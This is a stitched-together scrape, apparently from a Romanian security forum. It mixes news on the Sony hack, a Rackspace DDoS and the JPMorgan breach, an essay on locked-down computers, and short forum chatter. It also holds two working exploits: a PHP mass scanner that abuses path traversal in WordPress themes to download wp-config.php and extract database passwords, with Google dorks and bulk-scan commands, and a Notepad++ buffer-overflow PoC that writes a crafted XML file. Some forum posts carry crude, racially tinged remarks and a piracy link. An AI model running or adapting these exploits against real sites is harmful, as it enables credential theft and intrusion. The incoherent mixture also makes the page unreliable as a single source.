(Reuters) - Sony Pictures made "The Interview" available online on Wednesday, a day before its theatrical release, after reversing a decision made a week ago to cancel the movie's release following a massive cyberattack. The film was available for rental on Google Inc's YouTube site as of early Wednesday afternoon. Microsoft Corp and Sony itself are also showing the comedy, a day before its scheduled premiere at some 320 independent theaters. "We chose the path of digital distribution first so as to reach as many people as possible on opening day, and we continue to seek other partners and platforms to further expand the release," Sony Entertainment Chief Executive Michael Lynton said in a statement. He added that Sony had first reached out to Google, Microsoft "and other partners" on Dec. 17, the day the studio said it was canceling the movie's Christmas Day release. The movie, which stars Seth Rogen and James Franco and is about a fictional plot to assassinate North Korean leader Kim Jong Un, triggered the most destructive cyberattack ever to target a U.S. company, resulting in the release of hundreds of embarrassing emails and confidential data. U.S. President Barack Obama last week blamed the cyberattacks on North Korea and added to a chorus of criticism by politicians and Hollywood actors, screenwriters and directors accusing Sony of caving to the hackers' demands by censoring itself. In addition to YouTube Movies, Google Play, Microsoft's Xbox Video, the comedy will be available on a dedicated website, www.seetheinterview.com, to rent for $5.99 or buy for $14.99. No cable or satellite TV operator has yet agreed to make "The Interview" available through video on demand (VOD). The showing is a chance for Google and Microsoft, which have been bit players in a VOD market dominated by Apple Inc, Amazon.com Inc and cable and satellite operators, to raise their profile. It was unclear the extent to which the online release would dampen moviegoers' appetite to see the comedy in the independent theaters that announced on Tuesday they planned to show it. Many Christmas Day screenings were sold out, including one that begins right after midnight at the 184-seat Silent Movie Theatre in Los Angeles. "I need to say that a comedy is best viewed in a theater full of people, so if you can, I'd watch it like that," Rogen tweeted. "Or call some friends over." Google said it had weighed the security implications of screening the movie - described by reviewers as "profane" and "raunchy" - after Sony contacted the company about making it available online. "IMPOSING CENSORSHIP" "But after discussing all the issues, Sony and Google agreed that we could not sit on the sidelines and allow a handful of people to determine the limits of free speech in another country (however silly the content might be)," Google's chief legal officer, David Drummond, wrote in a blog post. Google has an "enormous" infrastructure that is well tested in fighting off denial of service and other attacks, said Barrett Lyon, principal strategist with F5 Networks and an expert in Internet network security. "I wouldn't imagine seeing 'lights-out' at YouTube," he said, adding that Microsoft could be more vulnerable Sony pulled the movie after major theater chains refused to show it. That followed threats of September 11, 2001 style attacks from Guardians of Peace, the group that claimed responsibility for the cyberattacks against Sony. The White House on Wednesday praised the decision to release the film. "As the president made clear on Friday, we do not live in a country where a foreign dictator can start imposing censorship here in the United States," White House spokesman Eric Schultz said in a statement. "With today’s announcements, people can now make their own choices about the film, and that’s how it should be." A national security official said on Tuesday that U.S. authorities did not take the hackers' threats against theatergoers seriously. CNN, which first reported that Sony was in talks with Google's YouTube on releasing the movie, said the studio also had held talks with Apple about making the comedy available on its iTunes store but that the negotiations broke down. Obama vowed in a news conference on Friday to respond to the cyberattack "in a place and timing and manner that we choose." Japan, meanwhile, has begun working to ensure basic infrastructure is safe and to formulate its diplomatic response, officials said, fearing it could be a soft target for possible North Korean cyberattacks in the escalating row over the Sony Pictures hack. And South Korea is seeking the cooperation of Chinese authorities in a probe into a cyberattack on its nuclear power plant operator after tracing multiple Internet addresses involved to a northeastern Chinese city near North Korea, a prosecution official said. (This story has been refiled to correct the spelling to YouTube from Youtube) (Additional reporting by Michele Gershberg and Liana Baker in New York, Jim Finkle in Boston, Meeyoung Cho in Seoul, Tim Kelly and Nobuhiro Kubo in Tokyo; Writing by Christian Plumb; Editing by Gunna Dickson and Steve Orlofsky) Source

#!/usr/bin/php -q <?php #=============================================================================== # *NAME*: Wordpress A.F.D Verification/ INURL - BRASIL # *TIPE*: Arbitrary File Download # *Tested on*: Linux # *EXECUTE*: php exploit.php www.target.gov.us # *OUTPUT*: WORDPRES_A_F_D.txt # *AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL # *EMAIL*: inurllbr@gmail.com # *Blog*: http://blog.inurl.com.br # *Twitter*: https://twitter.com/googleinurl # *Fanpage*: https://fb.com/InurlBrasil # *GIT: * https://github.com/googleinurl # *YOUTUBE * https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA # *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/ # # ------------------------------------------------------------------------------ # Comand Exec Scanner INURLBR: # ./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_" # ------------------------------------------------------------------------------ # # Download Scanner INURLBR: # https://github.com/googleinurl/SCANNER-INURLBR # ------------------------------------------------------------------------------ # # *PRINT:* http://i.imgur.com/45BFlNe.png # ------------------------------------------------------------------------------ # # *Description:* # This exploit allows the attacker to exploit the flaw Arbitrary File Download in dozens of wordpress themes. # Through regular expressions, the script will perform the check for each target url checking your wp-config.php file # Regular expressions: # preg_match_all("(DB_NAME.*')", $body, $status['DB_NAME']); # preg_match_all("(DB_USER.*')", $body, $status['DB_USER']); # preg_match_all("(DB_PASSWORD.*')", $body, $status['DB_PASSWORD']); # preg_match_all("(DB_HOST.*')", $body, $status['DB_HOST']); # preg_match_all("(DB_CHARSET.*')", $body, $status['DB_CHARSET']); # ------------------------------------------------------------------------------ # # *Usage info:* # php script.php www.target.gov.us # File download wp-config.php # Failure consists of exploring a parameter $_GET # The following fields are exploited for Arbitrary File Download # # *Check failure Arbitrary File Download* # # /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php # /wp-content/force-download.php?file=../wp-config.php # /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php # /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php # /wp-content/themes/markant/download.php?file=../../wp-config.php # /wp-content/themes/yakimabait/download.php?file=./wp-config.php # /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php # /wp-content/themes/felis/download.php?file=../wp-config.php # /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php # /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php # /wp-content/themes/epic/includes/download.php?file=wp-config.php # /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php # /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php # /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php # /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php # /wp-content/themes/lote27/download.php?download=../../../wp-config.php # /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php # /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php # # # *D O R K'S:* # ------------------------------------------------------------------------------ # # WordPress Ultimatum Theme Arbitrary File Download # Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s # Google Dork:: "Index of" & /wp-content/themes/ultimatum # ------------------------------------------------------------------------------ # # WordPress Medicate Theme Arbitrary File Download # Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916 # Google Dork:: "Index of" & /wp-content/themes/medicate/ # ------------------------------------------------------------------------------ # # WordPress Centum Theme Arbitrary File Download # Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603 # Google Dork:: "Index of" & /wp-content/themes/Centum/ # ------------------------------------------------------------------------------ # # WordPress Avada Theme Arbitrary File Download # Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226 # Google Dork:: "Index of" & /wp-content/themes/Avada/ # ------------------------------------------------------------------------------ # # WordPress Striking Theme & E-Commerce Arbitrary File Download # Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763 # Google Dork:: "Index of" & /wp-content/themes/striking_r/ # ------------------------------------------------------------------------------ # # WordPress Beach Apollo Arbitrary File Download # Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/ # Google Dork:: "Index of" & /wp-content/themes/beach_apollo/ # ------------------------------------------------------------------------------ # # Dork Google: inurl:ajax-store-locator # index of ajax-store-locator # Vendor Homepage:: http://codecanyon.net/item/ajax-store-locator-wordpress/5293356 # ------------------------------------------------------------------------------ # # WordPress cuckootap Theme Arbitrary File Download # Google Dork:: "Index of" & /wp-content/themes/cuckootap/ # Vendor Homepage:: http://www.cuckoothemes.com/ # ------------------------------------------------------------------------------ # # WordPress IncredibleWP Theme Arbitrary File Download # Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/ # Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/ # ------------------------------------------------------------------------------ # # WordPress Ultimatum Theme Arbitrary File Download # Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s # Google Dork:: "Index of" & /wp-content/themes/ultimatum # ------------------------------------------------------------------------------ # # WordPress Medicate Theme Arbitrary File Download # Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916 # Google Dork:: "Index of" & /wp-content/themes/medicate/ # ------------------------------------------------------------------------------ # # WordPress Centum Theme Arbitrary File Download # Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603 # Google Dork:: "Index of" & /wp-content/themes/Centum/ # ------------------------------------------------------------------------------ # # WordPress Avada Theme Arbitrary File Download # Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226 # Google Dork:: "Index of" & /wp-content/themes/Avada/ # ------------------------------------------------------------------------------ # # WordPress Striking Theme & E-Commerce Arbitrary File Download # Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763 # Google Dork:: "Index of" & /wp-content/themes/striking_r/ # ------------------------------------------------------------------------------ # # WordPress Beach Apollo Arbitrary File Download # Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/ # Google Dork:: "Index of" & /wp-content/themes/beach_apollo/ # ------------------------------------------------------------------------------ # # WordPress Trinity Theme Arbitrary File Download # Vendor Homepage:: https://churchthemes.net/themes/trinity/ # Google Dork:: "Index of" & /wp-content/themes/trinity/ # ------------------------------------------------------------------------------ # # WordPress Lote27 Theme Arbitrary File Download # Google Dork:: "Index of" & /wp-content/themes/lote27/ # ------------------------------------------------------------------------------ # # WordPress Revslider Theme Arbitrary File Download # Vendor Homepage:: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405 # Google Dork:: wp-admin & inurl:revslider_show_image # ------------------------------------------------------------------------------ # #=============================================================================== $banner = " _____ (_____) ____ _ _ _ _ _____ _ ____ _ _ (() ()) |_ _| \ | | | | | __ \| | | _ \ (_) | \ / | | | \| | | | | |__) | | ______ | |_) |_ __ __ _ ___ _| | \ / | | | . ` | | | | _ /| | |______| | _ <| '__/ _` / __| | | /=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | | (_| \__ \ | | [___] |_____|_| \_|\____/|_| \_\______| |____/|_| \__,_|___/_|_| \n\033[1;37m0xNeither war between hackers, nor peace for the system.\033[0m\r "; error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); function __plus() { ob_flush(); flush(); } print empty($argv[1]) ? exit("{$banner}0x[ERROR]: SET URL / Execute: php exploit.php www.target.gov.us\n") : NULL; $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http:// {$argv[1]}"; !filter_var($argv[1], FILTER_VALIDATE_URL) ? exit("{$banner}0x[ERROR]: SET URL / Execute: php exploit.php www.target.gov.us\n") : NULL; print "\r\n{$banner}0x[EXPLOIT NAME]: WORDPRESS A.F.D / INURL - BRASIL"; print "\n------------------------------------------------------------------------------------------------------------------"; __plus(); $users = file_get_contents("{$argv[1]}/?author=1"); __plus(); preg_match('/<title>(.*?)<\/title>/si', $users, $user); $wpuser = explode('|', $user[1]); $headers = get_headers($argv[1], 1); __plus(); print "\n0x " . date("h:m:s") . " [INFO][COD]:: "; print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL); print "\n0x " . date("h:m:s") . " [INFO][Server]:: "; is_array($headers['Server']) ? print_r($headers['Server'][0]) : print_r($headers['Server']); print "\n0x " . date("h:m:s") . " [INFO][X-Pingback]:: "; is_array($headers['X-Pingback']) ? print_r($headers['X-Pingback'][0]) : print_r($headers['X-Pingback']); print "\n0x " . date("h:m:s") . " [INFO][X-Powered-By]:: "; is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) : print_r($headers['X-Powered-By']); print_r("\n0x " . date("h:m:s") . " [INFO][TARGET]:: {$argv[1]} | [WP USER]:: " . str_replace("\n", '', $wpuser[0])); print "\n0x " . date("h:m:s") . " [INFO][OUTPUT FILE]:: WORDPRESS_A_F_D.txt\n"; __plus(); __request($argv[1], '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'); __request($argv[1], '/wp-content/force-download.php?file=../wp-config.php'); __request($argv[1], '/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php'); __request($argv[1], '/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php'); __request($argv[1], '/wp-content/themes/markant/download.php?file=../../wp-config.php'); __request($argv[1], '/wp-content/themes/yakimabait/download.php?file=./wp-config.php'); __request($argv[1], '/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php'); __request($argv[1], '/wp-content/themes/felis/download.php?file=../wp-config.php'); __request($argv[1], '/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php'); __request($argv[1], '/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php'); __request($argv[1], '/wp-content/themes/epic/includes/download.php?file=wp-config.php'); __request($argv[1], '/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php'); __request($argv[1], '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php'); __request($argv[1], '/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php'); __request($argv[1], '/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'); __request($argv[1], '/wp-content/themes/lote27/download.php?download=../../../wp-config.php'); __request($argv[1], '/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php'); __request($argv[1], '/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php'); function __request($url, $plugin) { $objcurl = curl_init(); $caminho = NULL; $status = array(); curl_setopt($objcurl, CURLOPT_URL, $url . $plugin); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)"); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20); $corpo = curl_exec($objcurl); if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) { return __request($url, "{$plugin}&file=" . str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php"); } __plus(); if (preg_match("#DB_NAME#i", $corpo) || preg_match("#readfile(#i", $corpo)) { //----------------------------------------------------------------------------- preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']); preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']); preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']); preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']); preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']); //----------------------------------------------------------------------------- __plus(); $res = "\n------------------------------------------------------------------------------------------------------------------\n\033[0;32m0x " . date("h:m:s") . " [INFO][VULN]:: \033[1;37m [ " . date("d-m-Y H:i:s") . " ]\n"; $res.= ("\033[0;32m0x " . date("h:m:s") . " [INFO][VULN][DB]::\033[1;37m " . $status['DB_NAME'][0][0]); $res.= ("::" . $status['DB_USER'][0][0]); $res.= ("::" . $status['DB_PASSWORD'][0][0]); $res.= ("::" . $status['DB_HOST'][0][0]); $res.= ("::" . $status['DB_CHARSET'][0][0]); $res.= "\n\033[0;32m0x " . date("h:m:s") . " [INFO][VULN][URL]::\033[1;37m{$url}{$plugin}\033[0m"; $res.= "\n------------------------------------------------------------------------------------------------------------------\n\033[0m"; print $res; $res = str_replace('[1;37m', '', str_replace('[0m', '', str_replace('[0;32m', '', $res))); file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND); __plus(); } else { print "\n\033[1;31m0x " . date("h:m:s") . " [INFO][NOT VULN]::\033[1;37m {$url}{$plugin} \n\033[0m"; } curl_close($objcurl); __plus(); } Source

#!/usr/bin/python # Exploit Title: NotePad++ v6.6.9 Buffer Overflow # URL Vendor: http://notepad-plus-plus.org/ # Vendor Name: NotePad # Version: 6.6.9 # Date: 22/12/2014 # CVE: CVE-2014-1004 # Author: TaurusOmar # Twitter: @TaurusOmar_ # Email: taurusomar13@gmail.com # Home: overhat.blogspot.com # Risk: Medium #Description: #Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages. #Running in the MS Windows environment, its use is governed by GPL License. #Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed #and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon #dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment. #Proof Concept #http://i.imgur.com/TTDtxJM.jpg #Code import struct def little_endian(address): return struct.pack("<L",address) poc ="\x41" * 591 poc+="\xeb\x06\x90\x90" poc+=little_endian(0x1004C31F) poc+="\x90" * 80 poc+="\x90" * (20000 - len(poc)) header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22" header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55" header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a" exploit = header + footer filename = "notepad.xml" file = open(filename , "w") file.write(exploit) file.close() Source

Adevarul e ca avem curve frumoasa... In alta ordine de ideei si muzica buna avem dar multe (extrem de multe) persoane cafenii

ai pm

Rackspace says it has recovered from a nasty distributed denial of service attack that it says may have seen “a portion of legitimate traffic to our DNS infrastructure … inadvertently blocked.” The trouble started just before lunchtime on Monday, US central time, and persisted until 11 hours later. Over on the company's Google+ page Rackspace warned of “intermittent periods of latency, packet loss, or connectivity failures when attempting to reach rackspace.com or subdomains within rackspace.com.” The company's status report later confirmed it had “... identified a UDP DDoS attack targeting the DNS servers in our IAD, ORD, and LON data centers [North Virigina, Chicago and London]. As a result of this issue, authoritative DNS resolution for any new request to the DNS servers began to fail in the affected data centers. In order to stabilize the issue, our teams placed the impacted DNS infrastructure behind mitigation services. This service is designed to protect our infrastructure, however, due to the nature of the event, a portion of legitimate traffic to our DNS infrastructure may be inadvertently blocked. Our teams are actively working to mitigate the attack and provide service stability.” Rackspace is now confident things are back in order, as it has blacklisted DNS servers that were “sending both legitimate and DDoS traffic to Rackspace”. Users may not be entirely out of the woods, as its most recent update says “If you continue to experience adverse impact, please reach out to your support teams and provide trace route information for further investigations.” A full root cause analysis of the incident is under way. Source

Hackers broke into JPMorgan's network through a giant security hole left open by a failure to switch on two-factor authentication on an overlooked server. The New York Times reports that technicians at JPM had failed to upgrade one of its network servers, meaning that access was possible without knowing a combination of a password and the value of a one-time code. The newspaper learnt of this failure to apply industry-standard security practice from unnamed sources familiar with the details of ongoing investigations into the breach. The working theory is that hackers used compromised access to the insecure server as a launch pad for attacks against more sensitive systems. It’s nearly always easier to hack systems once a foothold inside a targeted organisation has been obtained. Such stepping-stone attack tactics have been common hacking practice for years. JPMorgan Chase admitted in September that the names, addresses, phone numbers and e-mail addresses of 83 million account holders had been exposed in one one of the biggest data security breaches in history. 76 million of those, along with seven million small biz customers, had their private information publicly exposed as a result of the breach, which was rumoured to be the handiwork of Russian cyber-criminals. The attack was reportedly detected by the bank's security team in late July 2014. JPMorgan Chase has played down the impact of the attack and there's no reports of widespread fraud as a result of it. The main risk comes from the possibility that crooks might be able to produce more convincing phishing attacks using the stolen information. Source

We live in a world made of computers. Your car is a computer that drives down the freeway at 60 mph with you strapped inside. If you live or work in a modern building, computers regulate its temperature and respiration. And we're not just putting our bodies inside computers—we're also putting computers inside our bodies. I recently exchanged words in an airport lounge with a late arrival who wanted to use the sole electrical plug, which I had beat him to, fair and square. “I need to charge my laptop,” I said. “I need to charge my leg,” he said, rolling up his pants to show me his robotic prosthesis. I surrendered the plug. You and I and everyone who grew up with earbuds? There's a day in our future when we'll have hearing aids, and chances are they won't be retro-hipster beige transistorized analog devices: They'll be computers in our heads. And that's why the current regulatory paradigm for computers, inherited from the 16-year-old stupidity that is the Digital Millennium Copyright Act, needs to change. As things stand, the law requires that computing devices be designed to sometimes disobey their owners, so that their owners won't do something undesirable. To make this work, we also have to criminalize anything that might help owners change their computers to let the machines do that supposedly undesirable thing. This approach to controlling digital devices was annoying back in, say, 1995, when we got the DVD player that prevented us from skipping ads or playing an out-of-region disc. But it will be intolerable and deadly dangerous when our 3-D printers, self-driving cars, smart houses, and even parts of our bodies are designed with the same restrictions. Because those restrictions would change the fundamental nature of computers. Speaking in my capacity as a dystopian science fiction writer: This scares the hell out of me. IF WE ARE ALLOWED TO HAVE TOTAL CONTROL OVER OUR OWN COMPUTERS, WE MAY ENTER A SCI-FI WORLD OF UNPARALLELED LEISURE AND EXCITEMENT. The general-purpose computer is one of the crowning achievements of industrial society. Prior to its invention, electronic calculating engines were each hardwired to do just one thing, like calculate ballistics tables. John von Neumann's “von Neumann architecture” and Alan Turing's “Turing-complete computer” provided the theoretical basis for building a calculating engine that could run any program that could be expressed in symbolic language. That breakthrough still ripples through society, revolutionizing every corner of our world. When everything is made of computers, an improvement in computers makes everything better. But there's a terrible corollary to that virtuous cycle: Any law or regulation that undermines computers' utility or security also ripples through all the systems that have been colonized by the general-purpose computer. And therein lies the potential for untold trouble and mischief. Because while we've spent the past 70 years perfecting the art of building computers that can run every single program, we have no idea how to build a computer that can run every program except the one that infringes copyright or prints out guns or lets a software-based radio be used to confound air-traffic control signals or cranks up the air-conditioning even when the power company sends a peak-load message to it. The closest approximation we have for “a computer that runs all the programs except the one you don't like” is “a computer that is infected with spyware out of the box.” By spyware I mean operating-system features that monitor the computer owner's commands and cancel them if they're on a blacklist. Think, for example, of image scanners that can detect if you're trying to scan currency and refuse to further process the image. As much as we want to prevent counterfeiting, imposing codes and commands that you can't overrule is a recipe for disaster. Why? Because for such a system to work, remote parties must have more privileges on it than the owner. And such a security model must hide its operation from the computer's normal processes. When you ask your computer to do something reasonable, you expect it to say, “Yes, master” (or possibly “Are you sure?”), not “I CAN'T LET YOU DO THAT, DAVE.” If the “I CAN'T LET YOU DO THAT, DAVE” message is being generated by a program on your desktop labeled HAL9000.exe, you will certainly drag that program into the trash. If your computer's list of running programs shows HAL9000.exe lurking in the background like an immigration agent prowling an arrivals hall, looking for sneaky cell phone users to shout at, you will terminate that process with a satisfied click. So the only way to sustain HAL9000.exe and its brethren—the programs that today keep you from installing non-App Store apps on your iPhone and tomorrow will try to stop you from printing gun.stl on your 3-D printer—is to design the computer to hide them from you. And that creates vulnerabilities that make your computer susceptible to malicious hacking. Consider what happened in 2005, when Sony BMG started selling CDs laden with the notorious Sony rootkit, software designed to covertly prevent people from copying music files. Once you put one of Sony BMG's discs into your computer's CD drive, it would change your OS so that files beginning with $sys$ were invisible to the system. The CD then installed spyware that watched for attempts to rip any music CD and silently blocked them. Of course, virus writers quickly understood that millions of PCs were now blind to any file that began with $sys$ and changed the names of their viruses accordingly, putting legions of computers at risk. Code always has flaws, and those flaws are easy for bad guys to find. But if your computer has deliberately been designed with a blind spot, the bad guys will use it to evade detection by you and your antivirus software. That's why a 3-D printer with anti-gun-printing code isn't a 3-D printer that won't print guns—the bad guys will quickly find a way around that. It's a 3-D printer that is vulnerable to hacking by malware creeps who can use your printer's “security” against you: from bricking your printer to screwing up your prints to introducing subtle structural flaws to simply hijacking the operating system and using it to stage attacks on your whole network. This business of designing computers to deliberately weasel and lie isn't the worst thing about the war on the general-purpose computer and the effort to bodge together a “Turing-almost-complete” architecture that can run every program except for one that distresses a government, police force, corporation, or spy agency. No, the worst part is that, like the lady who had to swallow the bird to catch the spider that she'd swallowed to catch the fly, any technical system that stops you from being the master of your computer must be accompanied by laws that criminalize information about its weaknesses. In the age of Google, it simply won't do to have “uninstall HAL9000.exe” return a list of videos explaining how to jailbreak your gadgets, just as videos that explain how to jailbreak your iPhone today could technically be illegal; making and posting them could potentially put their producers (and the sites that host them) at risk of prosecution. This amounts to a criminal sanction for telling people about vulnerabilities in their own computers. And because today your computer lives in your pocket and has a camera and a microphone and knows all the places you go; and because tomorrow that speeding car/computer probably won't even sport a handbrake, let alone a steering wheel—the need to know about any mode that could be exploited by malicious hackers will only get more urgent. There can be no “lawful interception” capacity for a self-driving car, allowing police to order it to pull over, that wouldn't also let a carjacker compromise your car and drive it to a convenient place to rob, rape, and/or kill you. If those million-eyed, fast-moving, deep-seated computers are designed to obey their owners; if the policy regulating those computers encourages disclosure of flaws, even if they can be exploited by spies, criminals, and cops; if we're allowed to know how they're configured and permitted to reconfigure them without being overridden by a distant party—then we may enter a science fictional world of unparalleled leisure and excitement. But if the world's governments continue to insist that wiretapping capacity must be built into every computer; if the state of California continues to insist that cell phones have kill switches allowing remote instructions to be executed on your phone that you can't countermand or even know about; if the entertainment industry continues to insist that the general-purpose computer must be neutered so you can't use it to watch TV the wrong way; if the World Wide Web Consortium continues to infect the core standards of the web itself to allow remote control over your computer against your wishes—then we are in deep, deep trouble. The Internet isn't just the world's most perfect video-on-demand service. It's not simply a better way to get pornography. It's not merely a tool for planning terrorist attacks. Those are only use cases for the net; what the net is, is the nervous system of the 21st century. It's time we started acting like it. Source

http://filmehd.net/the-town-that-dreaded-sundown-2014-filme-online.html E nou, pot spune ca e o capodopera de film! nota 10.

Sarbatori fericite tuturor!

face palm... cum pot cere azil politic in zimbabwe?

@Nytro sau cine are timp sa se ocupe de imagini findca da 404 de pe orice site as pune imagini degeaba da 404... Testat: Mozilla / IE / Chrome Am dat TC, s-a rezolvat!

omule esti terminat e vorba de o versiune a pentru firewall si sa facut patch! nu mai comenta aiurea + ai facut dublu post sa baneze cineva acest copil! "router" unde e greseala ma copile? m-am exprimat eu gresit probabil dar daca nu esti capabil sa intelegi asta e partea a doua! e pentru o versiune de firewall specifica unui anumit gen de router.